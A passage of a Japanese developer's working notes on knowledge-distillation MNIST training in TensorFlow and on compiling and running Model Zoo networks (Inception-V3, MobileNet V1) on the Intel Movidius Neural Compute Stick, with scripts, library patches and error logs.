tf.placeholder(tf.float32) x_image = tf.reshape(x, [-1,28,28,1]) y_conv_teacher=MnistNetworkTeacher(x_image,keep_prob_conv, keep_prob_hidden,scope = 'teacher') y_conv = MnistNetworkStudent(x,scope = 'student') y_conv_student = tf.nn.softmax(y_conv/temperature) y_conv_student_actual = tf.nn.softmax(y_conv) cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher, y_, temperature = temperature) student_loss1, accuracy_student = loss(y_conv_student_actual, y_, temperature = temperature) student_loss2 = tf.reduce_mean( - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1) ) cross_entropy_student = student_loss1 + student_loss2 model_vars = tf.trainable_variables() var_teacher = [var for var in model_vars if 'teacher' in var.name] var_student = [var for var in model_vars if 'student' in var.name] grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher) grad_student = tf.gradients(cross_entropy_student,var_student) l_rate = tf.placeholder(shape=[],dtype = tf.float32) trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate) trainer1 = tf.train.GradientDescentOptimizer(0.1) train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher)) train_step_student = trainer1.apply_gradients(zip(grad_student,var_student)) sess = tf.InteractiveSession(config=config) sess.run(tf.global_variables_initializer()) saver1 = tf.train.Saver(var_teacher) saver2 = tf.train.Saver(var_student) # In[9]: #mnist = input_data.read_data_sets("MNIST_data/", one_hot=True) x_train, y_train, x_test, y_test, class_count = loadimg.loadimg( '/home/tokunn/make_image/', NUMBER_OF_CLASS ) # In[10]: for i in range(10000): #batch = mnist.train.next_batch(128) s = 128*i % len(x_train) batch = [x_train[s:s+128], y_train[s:s+128]] lr = start_lr * 1.0/(1.0 + i*decay) if i%100 ==0: train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("step %d, training accuracy %g,"%(i, train_accuracy)) train_step_teacher.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :0.8, #keep_prob_hidden:0.5}) keep_prob_hidden:0.5, l_rate:lr}) saver1.save(sess,'./models/teacher1.ckpt') print('*'*20) for i in range(30000): #batch = mnist.train.next_batch(100) s = 128*i % len(x_train) batch = [x_train[s:s+100], y_train[s:s+100]] if i%100 == 0: train_accuracy = accuracy_student.eval(feed_dict={x:x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("step %d, training accuracy %g"%(i, train_accuracy)) train_step_student.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :1.0, keep_prob_hidden:1.0}) saver2.save(sess,'./models/student.ckpt') # In[11]: test_acc = sess.run(accuracy_student,feed_dict={x: x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("test accuracy of the student model is %g "%(test_acc)) # In[13]: fw = tf.summary.FileWriter('logs', sess.graph) fw.close() # In[ ]:
loadimg
#!/usr/bin/env python2 import os import numpy as np import tensorflow as tf from keras.preprocessing.image import load_img, img_to_array from keras.utils import np_utils import matplotlib.pyplot as plt import glob from sklearn.model_selection import train_test_split IMGSIZE = 28 IMGSIZE = 28 def loadimg_one(DIRPATH, NUM): x = [] y = [] img_list = os.listdir(DIRPATH) if (NUM) and (len(img_list) > NUM): img_list = img_list[:NUM] #print("[loadimg] : img_list : ", end=' ') #print(img_list) img_count = 0 for number in img_list: dirpath = os.path.join(DIRPATH, number) dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg')) dirpic_list += glob.glob(os.path.join(dirpath, '*.png')) for picture in dirpic_list: img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE))) x.append(img) y.append(img_count) #print("Load {0} : {1}".format(picture, img_count)) img_count += 1 output_count = img_count x = np.asarray(x) x = x.astype('float32') x = x/255.0 y = np.asarray(y, dtype=np.int32) y = np_utils.to_categorical(y, output_count) return x, y, output_count def loadimg(COMMONDIR='./', NUM=None): print("########## loadimg ########") #COMMONDIR = './make_image' TRAINDIR = os.path.join(COMMONDIR, 'train') TESTDIR = os.path.join(COMMONDIR, 'test') x_train, y_train, class_count = loadimg_one(TRAINDIR, NUM) x_test, y_test, _ = loadimg_one(TESTDIR, NUM) #for i in range(0, x_test.shape[0]): # plt.imshow(x_test[i]) # plt.show() x = np.concatenate((x_train, x_test)) x = np.reshape(x, [-1, 784]) y = np.concatenate((y_train, y_test)) print("x_train, y_train, x_test, y_test, class_count") print("x_train shape : ", x_train.shape) print("########## END of loadimg ########") x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.2, test_size=0.8) return x_train, y_train, x_test, y_test, class_count if __name__ == '__main__': loadimg()
コード変換
#!/usr/bin/env python # coding: utf-8 # In[1]: import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim from tensorflow.examples.tutorials.mnist import input_data import loadimg # In[2]: NUMBER_OF_CLASS = 10 # In[3]: def MnistNetworkStudent(input,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.sigmoid): net = slim.fully_connected(input,1000,scope = 'fc1') net = slim.fully_connected(net, NUMBER_OF_CLASS, activation_fn = None, scope = 'fc2') return net # In[4]: eps = 0.1 alpha = 0.5 temperature = 1 start_lr = 1e-4 decay = 1e-6 # In[5]: with tf.Graph().as_default(): x = tf.placeholder(tf.float32, shape=[None, 784], name='input') x_image = tf.reshape(x, [-1,28,28,1]) y_conv = MnistNetworkStudent(x,scope = 'student') y_conv_student = tf.nn.softmax(y_conv/temperature, name='output_temp') y_conv_student_actual = tf.nn.softmax(y_conv, name='output') model_vars = tf.trainable_variables() var_student = [var for var in model_vars if 'student' in var.name] sess = tf.InteractiveSession() sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) saver2 = tf.train.Saver(var_student) # In[6]: saver2.restore(sess, './models/student.ckpt') saver2.save(sess,'./models/student_flozen.ckpt') # In[7]: fw = tf.summary.FileWriter('logs', sess.graph) fw.close()
Movidius 予測
import mvnc.mvncapi as mvnc import numpy as np from PIL import Image import cv2 import time, sys, os import glob IMAGE_DIR_NAME = '/home/tokunn/make_image/' if (len(sys.argv) > 1): IMAGE_DIR_NAME = sys.argv[1] #IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images' def predict(input): print("Start prediting ...") devices = mvnc.EnumerateDevices() device = mvnc.Device(devices[0]) device.OpenDevice() # Load graph file data with open('./models/graph', 'rb') as f: graph_file_buffer = f.read() # Initialize a Graph object graph = device.AllocateGraph(graph_file_buffer) start = time.time() for i in range(len(input)): # Write the tensor to the input_fifo and queue an inference graph.LoadTensor(input[i], None) output, userobj = graph.GetResult() print(np.argmax(output), end=' ') stop = time.time() print('') print("Time : {0} ({1} images)".format(stop-start, len(input))) graph.DeallocateGraph() device.CloseDevice() return output if __name__ == '__main__': print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png'))) jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg')) jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png')) if not len(jpg_list): print("No image file") sys.exit() jpg_list.reverse() print([i.split('/')[-1] for i in jpg_list][:10]) img_list = [] for n in jpg_list: image = cv2.imread(n) image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) image = cv2.resize(image, (28, 28)) img_list.append(image) img_list = np.asarray(img_list) * (1.0/255.0) img_list = np.reshape(img_list, [-1, 784]) print("imgshape ", img_list.shape) predict(img_list.astype(np.float16))
ソースコード2
[None, 28, 28, 3]で入力
#!/usr/bin/env python # coding: utf-8 # In[1]: import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim from tensorflow.examples.tutorials.mnist import input_data import loadimg # In[2]: NUMBER_OF_CLASS = 10 # In[3]: def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.conv2d], kernel_size = [3,3], stride = [1,1], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu): net = slim.conv2d(input, 32, scope='conv1') net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 64,scope='conv2') net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 128,scope='conv3') net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') net = tf.nn.dropout(net, keep_prob_conv) net = slim.flatten(net) with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu) : net = slim.fully_connected(net,625,scope='fc1') net = tf.nn.dropout(net, keep_prob_hidden) net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2') net = tf.nn.softmax(net/temperature) return net # In[4]: def MnistNetworkStudent(input,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.sigmoid): net = slim.fully_connected(input,1000,scope = 'fc1') net = slim.fully_connected(net, NUMBER_OF_CLASS, activation_fn = None, scope = 'fc2') return net # In[5]: def loss(prediction,output,temperature = 1): cross_entropy = tf.reduce_mean(-tf.reduce_sum( output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)), reduction_indices=[1])) correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) return cross_entropy,accuracy # In[6]: eps = 0.1 alpha = 0.5 temperature = 1 start_lr = 1e-4 decay = 1e-6 # In[7]: with tf.Graph().as_default(): x = tf.placeholder(tf.float32, shape=[None, 28,28,1], name='input') y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS]) keep_prob_conv = tf.placeholder(tf.float32) keep_prob_hidden = tf.placeholder(tf.float32) x_line = tf.reshape(x, [-1,784]) y_conv_teacher=MnistNetworkTeacher(x,keep_prob_conv, keep_prob_hidden,scope = 'teacher') y_conv = MnistNetworkStudent(x_line,scope = 'student') y_conv_student = tf.nn.softmax(y_conv/temperature) y_conv_student_actual = tf.nn.softmax(y_conv) cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher, y_, temperature = temperature) student_loss1, accuracy_student = loss(y_conv_student_actual, y_, temperature = temperature) student_loss2 = tf.reduce_mean( - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1) ) cross_entropy_student = student_loss1 + student_loss2 model_vars = tf.trainable_variables() var_teacher = [var for var in model_vars if 'teacher' in var.name] var_student = [var for var in model_vars if 'student' in var.name] grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher) grad_student = tf.gradients(cross_entropy_student,var_student) l_rate = tf.placeholder(shape=[],dtype = tf.float32) trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate) trainer1 = tf.train.GradientDescentOptimizer(0.1) train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher)) train_step_student = trainer1.apply_gradients(zip(grad_student,var_student)) sess = tf.InteractiveSession() sess.run(tf.global_variables_initializer()) saver1 = tf.train.Saver(var_teacher) saver2 = tf.train.Saver(var_student) # In[8]: #mnist = input_data.read_data_sets("MNIST_data/", one_hot=True) x_train, y_train, x_test, y_test, class_count = loadimg.loadimg( '/home/tokunn/make_image/', NUMBER_OF_CLASS ) # In[9]: for i in range(10000): #batch = mnist.train.next_batch(128) s = 128*i % len(x_train) batch = [x_train[s:s+128], y_train[s:s+128]] lr = start_lr * 1.0/(1.0 + i*decay) if i%100 ==0: train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("step %d, training accuracy %g,"%(i, train_accuracy)) train_step_teacher.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :0.8, #keep_prob_hidden:0.5}) keep_prob_hidden:0.5, l_rate:lr}) saver1.save(sess,'./models/teacher1.ckpt') print('*'*20) for i in range(30000): #batch = mnist.train.next_batch(100) s = 128*i % len(x_train) batch = [x_train[s:s+100], y_train[s:s+100]] if i%100 == 0: train_accuracy = accuracy_student.eval(feed_dict={x:x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("step %d, training accuracy %g"%(i, train_accuracy)) train_step_student.run(feed_dict={x: batch[0], y_: batch[1], keep_prob_conv :1.0, keep_prob_hidden:1.0}) saver2.save(sess,'./models/student.ckpt') # In[10]: test_acc = sess.run(accuracy_student,feed_dict={x: x_test, y_: y_test, keep_prob_conv: 1.0, keep_prob_hidden: 1.0}) print("test accuracy of the student model is %g "%(test_acc)) # In[11]: fw = tf.summary.FileWriter('logs', sess.graph) fw.close()
TensorFlow Model Zooにある学習済みモデルをMovidiusで動かす( Inception-V3とMobileNet V1)
方法
ここに書いてある。 https://movidius.github.io/ncsdk/tf_modelzoo.html
ソースを落としてくる。
git clone https://github.com/tensorflow/tensorflow.git git clone https://github.com/tensorflow/models.git
学習済みのチェックポイントを落としてくる。
wget -nc http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gz tar -xvf inception_v3_2016_08_28.tar.gz
GraphDefファイルを出力。
python3 ../models/research/slim/export_inference_graph.py \ --alsologtostderr \ --model_name=inception_v3 \ --batch_size=1 \ --dataset_name=imagenet \ --image_size=299 \ --output_file=inception_v3.pb
グラフのフリーズ。
python3 ../tensorflow/tensorflow/python/tools/freeze_graph.py \ --input_graph=inception_v3.pb \ --input_binary=true \ --input_checkpoint=inception_v3.ckpt \ --output_graph=inception_v3_frozen.pb \ --output_node_name=InceptionV3/Predictions/Reshape_1
mvNCCompile -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1
やってみる
フリーズの工程にて
tokunn@tokunn-VirtualBox 16:13:16 [~/Documents/MovidiusTensorflow/use_modelzoo/inceptionV3] $ python3 ~/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py \ > --input_graph=inception_v3.pb \ --input_binary=true \ --input_checkpoint=inception_v3.ckpt \ --output_graph=inception_v3_frozen.pb \ --output_node_name=InceptionV3/Predictions/Reshape_1 Traceback (most recent call last): File "/home/tokunn/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py", line 58, in <module> from tensorflow.python.training import checkpoint_management ImportError: cannot import name 'checkpoint_management'
動かない。
バグらしい。 https://github.com/tensorflow/tensorflow/issues/22019
いつも通りパッチを当てる。
58d57 < from tensorflow.python.training import checkpoint_management 59a59 > import tensorflow as tf 127c127 < not checkpoint_management.checkpoint_exists(input_checkpoint)): --- > not tf.train.checkpoint_exists(input_checkpoint)):
無事にfrozenなのが出力された。
mvNCCheckで
tokunn@nanase 7:41:25 [~] $ mvNCCheck -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1 2>/dev/null mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 Result: (1, 1, 1001) 1) 22 0.1576 2) 93 0.1223 3) 95 0.0448 4) 23 0.03558 5) 24 0.02771 Expected: (1, 1001) 1) 22 0.1599765 2) 93 0.12189513 3) 95 0.04604088 4) 23 0.03503471 5) 24 0.02783106 ------------------------------------------------------------ Obtained values ------------------------------------------------------------ Obtained Min Pixel Accuracy: 1.4900462701916695% (max allowed=2%), Pass Obtained Average Pixel Accuracy: 0.01522512175142765% (max allowed=1%), Pass Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass Obtained Pixel-wise L2 error: 0.06495287965302322% (max allowed=1%), Pass Obtained Global Sum Difference: 0.02438097447156906 ------------------------------------------------------------
問題なく動作した。
ほかのネットワークもやってみる (Mobilent V1)
ネットワークのリスト https://github.com/tensorflow/models/tree/master/research/slim/nets
重みのリスト https://github.com/tensorflow/models/tree/master/research/slim
モデルの準備
ネットワーク名はmobilenet_v1
重みは http://download.tensorflow.org/models/mobilenet_v1_2018_02_22/mobilenet_v1_0.5_160.tgz
なんか重みをダウンロードしたらmobilenet_v1_0.5_160_frozen.pb
も入ってた。
あとはコンパイルするだけ。
インプット/アウトプットノードの捜索
.pbファイルからノードを探す。
コードは添付。
結果
tokunn@tokunn-VirtualBox 17:02:17 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py] $ python3 getnodename_pb.py | grep input input , Placeholder tokunn@tokunn-VirtualBox 17:03:10 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py] $ python3 getnodename_pb.py | grep Predictions MobilenetV1/Predictions/Reshape_1 , Reshape
おそらくこのinput
とMobilenetV1/Predictions/Reshape_1
であろう。
コンパイル
ここまでは素直に来たのでコンパイル。
mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1
やっぱり終わらないエラーとの闘い。
tokunn@tokunn-VirtualBox 17:10:23 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 mvNCCompile v02.00, Copyright @ Movidius Ltd 2016 /home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py:923: DeprecationWarning: builtin type EagerTensor has no __module__ attribute EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase) /home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/tf_inspect.py:75: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead return _inspect.getargspec(target) 1 Traceback (most recent call last): File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1278, in _do_call return fn(*args) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1263, in _run_fn options, feed_dict, fetch_list, target_list, run_metadata) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1350, in _call_tf_sessionrun run_metadata) tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3] [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]] During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/usr/local/bin/mvNCCompile", line 118, in <module> create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights) File "/usr/local/bin/mvNCCompile", line 104, in create_graph net = parse_tensor(args, myriad_config) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 1061, in parse_tensor desired_shape = node.inputs[1].eval() File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 680, in eval return _eval_using_default_session(self, feed_dict, self.graph, session) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 4951, in _eval_using_default_session return session.run(tensors, feed_dict) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 877, in run run_metadata_ptr) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1100, in _run feed_dict_tensor, options, run_metadata) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1272, in _do_run run_metadata) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1291, in _do_call raise type(e)(node_def, op, message) tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3] [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]] Caused by op 'input', defined at: File "/usr/local/bin/mvNCCompile", line 118, in <module> create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights) File "/usr/local/bin/mvNCCompile", line 104, in create_graph net = parse_tensor(args, myriad_config) File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 211, in parse_tensor tf.import_graph_def(graph_def, name="") File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/deprecation.py", line 454, in new_func return func(*args, **kwargs) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 442, in import_graph_def _ProcessNewOps(graph) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 234, in _ProcessNewOps for new_op in graph._add_new_tf_operations(compute_devices=False): # pylint: disable=protected-access File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in _add_new_tf_operations for c_op in c_api_util.new_tf_operations(self) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in <listcomp> for c_op in c_api_util.new_tf_operations(self) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3180, in _create_op_from_tf_operation ret = Operation(c_op, self) File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 1717, in __init__ self._traceback = tf_stack.extract_stack() InvalidArgumentError (see above for traceback): You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3] [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]
どうやら入力のプレースホルダに何も与えられていない模様?
それは私のせいではないのではないだろうか?
I just got exactly the same problem. Hope someone can help
かなしい
https://github.com/ardamavi/Intel-Movidius-NCS-Keras/issues/2
The project is still in construction. Stay tuned!
This project is open source. If you share your patch, let's try to fix it together.
かなしい
I have come across similar problem, solved by modifying ncsdk source. In /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line 1059, add a feed_dict to eval:
いつも通り/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py
が悪さをしている説。
1061c1061 < desired_shape = node.inputs[1].eval() --- > desired_shape = node.inputs[1].eval(feed_dict={inputnode + ':0' : input_data})
今日も元気にパッチを当ててみる。
tokunn@tokunn-VirtualBox 17:25:33 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null mvNCCompile v02.00, Copyright @ Movidius Ltd 2016 1
無事に通った?
なんか出力が少なすぎる。
Check !
tokunn@nanase 8:32:09 [~] $ mvNCCheck -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null mvNCCheck v02.00, Copyright @ Movidius Ltd 2016 /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290 USB: Transferring Data... USB: Myriad Execution Finished USB: Myriad Connection Closing. USB: Myriad Connection Closed. Result: (1, 1, 1001) 1) 447 0.03534 2) 534 0.02742 3) 825 0.02272 4) 701 0.02151 5) 736 0.02039 Expected: (1, 1001) 1) 447 0.035791013 2) 534 0.027337724 3) 825 0.02282799 4) 701 0.021315519 5) 736 0.020063626 ------------------------------------------------------------ Obtained values ------------------------------------------------------------ Obtained Min Pixel Accuracy: 2.3404913023114204% (max allowed=2%), Fail Obtained Average Pixel Accuracy: 0.06249707657843828% (max allowed=1%), Pass Obtained Percentage of wrong values: 0.0999000999000999% (max allowed=0%), Fail Obtained Pixel-wise L2 error: 0.14634640928212883% (max allowed=1%), Pass Obtained Global Sum Difference: 0.022390704602003098 ------------------------------------------------------------
なんか2%以上ずれてるけど、まぁ正しく動いてるっぽい。
動かしてみる
実際に画像を入力して動かしてみる。
tokunn@nanase 10:41:39 [~/mobilenet] $ python3 pr_mvd_mblnet.py flower ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory Image path : flower/*.jpg imgshape (508, 75, 75) Start prediting ... 534 534 534 534 534 534 534 534 534 534 534 534 540 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 825 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 540 534 742 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 751 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 Time : 7.718486547470093 (508 images)
無事に動いた。
結論
Model ZooにあるデータならMovodiusで使える。
ソースコード
.pbからノードを列挙するコード
#!/usr/bin/env python3 import tensorflow as tf from tensorflow.python.platform import gfile filename = '../mobilenet_v1_0.5_160_frozen.pb' node_ops = [] with tf.gfile.GFile(filename, "rb") as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) for node in graph_def.node: print(str(node.name) + " , " + str(node.op))
Keras から .pbを出すコード
https://stackoverflow.com/questions/45466020/how-to-export-keras-h5-to-tensorflow-pb
def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True): """ Freezes the state of a session into a pruned computation graph. Creates a new computation graph where variable nodes are replaced by constants taking their current value in the session. The new graph will be pruned so subgraphs that are not necessary to compute the requested outputs are removed. @param session The TensorFlow session to be frozen. @param keep_var_names A list of variable names that should not be frozen, or None to freeze all the variables in the graph. @param output_names Names of the relevant graph outputs. @param clear_devices Remove the device directives from the graph for better portability. @return The frozen graph definition. """ from tensorflow.python.framework.graph_util import convert_variables_to_constants graph = session.graph with graph.as_default(): freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or [])) output_names = output_names or [] output_names += [v.op.name for v in tf.global_variables()] input_graph_def = graph.as_graph_def() if clear_devices: for node in input_graph_def.node: node.device = "" frozen_graph = convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names) return frozen_graph from keras import backend as K # Create, compile and train model... frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) tf.train.write_graph(frozen_graph, "some_directory", "my_model.pb", as_text=False)
TensorFlowのモデルをIntelのMovidius Neural Compute Stickを使ってRaspberryPiで動作させるメモ
概要
Raspberry PiでTensorFlow使って画像認識してしたい!
でもRaspberry PiのCPUでTensorFlow動かしても死ぬほど遅い
そこでIntelのMovidiusをRPIにぶっさすことで,超高速に推論ができるというものです.
これを動かすのにとても苦労したので,メモとして残しておきます.
ちなみに,推論しかできません.学習は別のコンピュータでやりましょう.
手順としては,
- ハイスペックなコンピュータでTensorFlowを使って学習
- TensorFlowの学習済みモデルを保存して,Movidiusで動くグラフにコンパイル
- グラフをRPIに持ってきて,Movidiusで推論
という方法になります.
この記事について
以下,やってる途中に書いたメモのコピペです.
説明するために書いてるわけじゃないのでかなり読みずらいと思います.
質問がありましたらTwitterまで
とーくん (@KTokunn) | Twitter
長ったらしいメモなので真面目に読むことはお勧めしません
ctrl+fでエラーメッセージのキーワードで検索してお読みください.
やったこと
- TensorFlow Low LayerのMnist (deep mnist)のサンプルをMovidiusで実行
- mvNCCompile,mvNCProfile,mvNCCheckが動くようにライブラリを書き換え (なぜか私の環境ではこれらのコンパイラが正しく動作しなかった)
- mvNCCheckに画像を読み込ませるやつはむっちゃごり押し
あとは,やたら出力とかをdetailsタグでまとめたので
Movidius NCSDK について
NCSDKとは
Movidius NCSDKはMovidius用にモデルを変換・チェックするためのコンパイラと、モデルを利用して推測を行うためのAPIを含むSDKのこと。
mvNCCompile, mvNCCheck, mvNCProfile
Movidius NCSDKのバージョン
- NCSDK1
- NCSDK2
NCSDK2に含まれるNCAPI v2ではAPIの関数が異なるため互換はない。
今回は情報が多いのでNCSDK1を使っていくことにします.
